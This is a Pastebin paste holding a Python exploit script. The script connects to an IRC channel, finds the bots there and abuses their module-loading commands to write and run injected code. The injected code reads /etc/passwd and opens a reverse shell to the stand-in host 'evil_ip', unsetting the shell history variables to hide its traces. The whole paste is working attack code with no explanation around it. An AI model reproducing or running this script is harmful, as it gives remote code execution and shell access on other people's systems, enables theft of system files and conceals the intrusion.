SHARE
TWEET

Untitled

a guest Aug 6th, 2012 250 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. from socket import *
  2. from time import sleep
  3. import re
  4. from random import sample
  5.  
  6. username = 'exploit'
  7. server = '172.16.72.128'
  8. port = 6667
  9. server_ver = AF_INET#6
  10. channel = 'eip'
  11.  
  12. module_name = ''.join(sample('qwertyuiopasdfghjklzxcvbnm', 7))
  13. service_path = '/root/.services_trololololoooo/torqux/' + module_name + '.py'
  14. func_name = ''.join(sample('qwertyuiopasdfghjklzxcvbnm', 7))
  15. backconnect_host = 'evil_ip'
  16. backconnect_port = '1165'
  17. backconnect_ver = 'AF_INET6'
  18. payload = 'import sys ; import os;import socket;import pty;shell = "/bin/sh";host = "' + backconnect_host + '";port = ' + backconnect_port + ';s = socket.socket(socket.' + backconnect_ver + ',socket.SOCK_STREAM);s.connect((host, port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.unsetenv("HISTFILE");os.unsetenv("HISTFILESIZE");pid = os.fork();pid or pty.spawn(shell); s.close()'
  19.  
  20. if __name__ == '__main__':
  21.     s = socket(server_ver, SOCK_STREAM)
  22.     s.connect((server, port))
  23.     s.send('NICK ' + username +'\r\n')
  24.     s.send('USER '+ (username + ' ')*3 + ':Python IRC\r\n')
  25.     sleep(10)
  26.     s.send('JOIN #' + channel + '\r\n')
  27.     res = ''
  28.     while 'End of MOTD command' not in res:
  29.         res += s.recv(100500)
  30.     s.send('PRIVMSG #' + channel + ' :!d\r\n')
  31.     sleep(4)
  32.     res1 = s.recv(100500)
  33.     #print res1
  34.     bots = []
  35.     for l in res1.splitlines():
  36.         nicks = re.findall(r'^:([^!]+)!.*? rolls', l)
  37.         if nicks:
  38.             bots.append(nicks[0])
  39.     print 'Found bots:', bots
  40.  
  41.     for bot in bots:
  42.         #bot = '#eip'
  43.         s.send('PRIVMSG ' + bot + ' :!_makeit 0\r\n')
  44.         sleep(1)
  45.         s.send('PRIVMSG ' + bot + ' :!messages ' + service_path + ' ' + 'def ' + func_name + '(a,b,c,d): a.sendLns(c, open("/etc/passwd").read()[0:100]); ' + payload + '\r\n')
  46.         sleep(1)
  47.         s.send('PRIVMSG ' + bot + ' :!_makeit 0\r\n')
  48.         sleep(1)
  49.         s.send('PRIVMSG ' + bot + ' :!_addit ' + module_name + '\r\n')
  50.         sleep(1)
  51.         s.send('PRIVMSG ' + bot + ' :!reload\r\n')
  52.         sleep(1)
  53.         s.send('PRIVMSG ' + bot + ' :!' + func_name + '\r\n')
  54.         sleep(1)
  55.  
  56.     if bots:
  57.         sleep(1)
  58.         print s.recv(100500)
  59.     s.close()
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top